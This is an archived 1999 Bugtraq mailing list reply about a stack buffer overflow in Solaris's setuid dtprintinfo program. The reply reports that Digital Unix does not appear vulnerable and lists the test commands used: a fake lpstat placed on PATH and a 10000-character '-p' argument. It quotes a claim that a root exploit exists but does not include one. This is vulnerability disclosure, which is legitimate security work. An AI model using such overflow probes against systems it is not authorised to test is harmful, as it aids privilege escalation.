Bugtraq mailing list archives
Re: Solaris2.6,2.7 dtprintinfo exploits
From: lamontg () RAVEN GENOME WASHINGTON EDU (Lamont Granquist)
Date: Mon, 10 May 1999 13:13:29 -0700
Digital Unix 4.0 through 4.0D w/BL11 (aka patch kit 3) does not appear to be vulnerable to this problem. Tested with: % cat > lpstat echo "system for lpprn: server.com" ^D % chmod 755 lpstat % setenv PATH .:$PATH % /usr/dt/bin/dtprintinfo -p `perl -e '{ print "A" x 10000 }'` On Mon, 10 May 1999, UNYUN@ShadowPenguin wrote:
"dtprintinfo" is suid program, the stack buffer can be overflowed by '-p' option. I made an exploit program that can get root for Intel edition of Solaris2.6 and Solaris 2.7.
-- Lamont Granquist lamontg () genome washington edu Dept. of Molecular Biotechnology (206)616-5735 fax: (206)685-7344 Box 352145 / University of Washington / Seattle, WA 98195 PGP pubkey: finger lamontg () raven genome washington edu | pgp -fka
Current thread:
- Re: Solaris2.6,2.7 dtprintinfo exploits Lamont Granquist (May 10)
- <Possible follow-ups>
- Re: Solaris2.6,2.7 dtprintinfo exploits Darren J Moffat - Enterprise Services OS Product Support Group (May 14)